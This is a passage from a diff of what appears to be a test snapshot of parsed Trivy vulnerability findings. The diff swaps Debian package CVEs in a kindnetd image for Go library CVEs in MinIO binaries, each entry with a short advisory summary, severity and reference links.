iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip6tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip6tc2", + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + "https://www.cve.org/CVERecord?id=CVE-2022-41721", ], }, "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", + "name": "request smuggling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://go.dev/cl/447396", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://go.dev/issue/56352", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.8.3-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3520", - "installedVersion": "1.8.3-1", - "packageName": "liblz4-1", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3520", - "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", - "https://errata.almalinux.org/8/ALSA-2021-2575.html", - "https://errata.rockylinux.org/RLSA-2021:2575", - "https://github.com/lz4/lz4/pull/972", - "https://linux.oracle.com/cve/CVE-2021-3520.html", - "https://linux.oracle.com/errata/ELSA-2021-2575.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", - "https://security.netapp.com/advisory/ntap-20211104-0005/", - "https://ubuntu.com/security/notices/USN-4968-1", - "https://ubuntu.com/security/notices/USN-4968-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3520", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "memory corruption due to an integer overflow bug caused by memmove argument", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3520", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3520", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-2575.html", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:2575", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/972", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3520.html", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2575.html", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0005/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4968-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4968-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3520", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-17543", - "installedVersion": "1.8.3-1", - "packageName": "liblz4-1", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", - "https://access.redhat.com/security/cve/CVE-2019-17543", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", - "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", - "https://github.com/lz4/lz4/issues/801", - "https://github.com/lz4/lz4/pull/756", - "https://github.com/lz4/lz4/pull/760", - "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", - "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", - "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", - "https://security.netapp.com/advisory/ntap-20210723-0001/", - "https://www.cve.org/CVERecord?id=CVE-2019-17543", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuoct2020.html", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "lz4: heap-based buffer overflow in LZ4_write32", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-17543", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-17543", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/issues/801", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/756", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/760", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210723-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-17543", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2020.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "5.2.4-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "5.2.4-1", - "packageName": "liblzma5", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-2835", + "installedVersion": "v1.9.3", + "packageName": "github.com/coredns/coredns", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-2835", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", + "https://github.com/advisories/GHSA-ch7v-37xg-75ph", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", + "https://www.cve.org/CVERecord?id=CVE-2022-2835", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of ..svc.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "coreDNS: DNS Redirection of Internal Services", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://avd.aquasec.com/nvd/cve-2022-2835", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://access.redhat.com/security/cve/CVE-2022-2835", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://github.com/advisories/GHSA-ch7v-37xg-75ph", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2835", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20305", - "installedVersion": "3.4.1-1", - "packageName": "libnettle6", + "fixedVersion": undefined, + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-2837", + "installedVersion": "v1.9.3", + "packageName": "github.com/coredns/coredns", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20305", - "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - "https://linux.oracle.com/cve/CVE-2021-20305.html", - "https://linux.oracle.com/errata/ELSA-2021-1206.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - 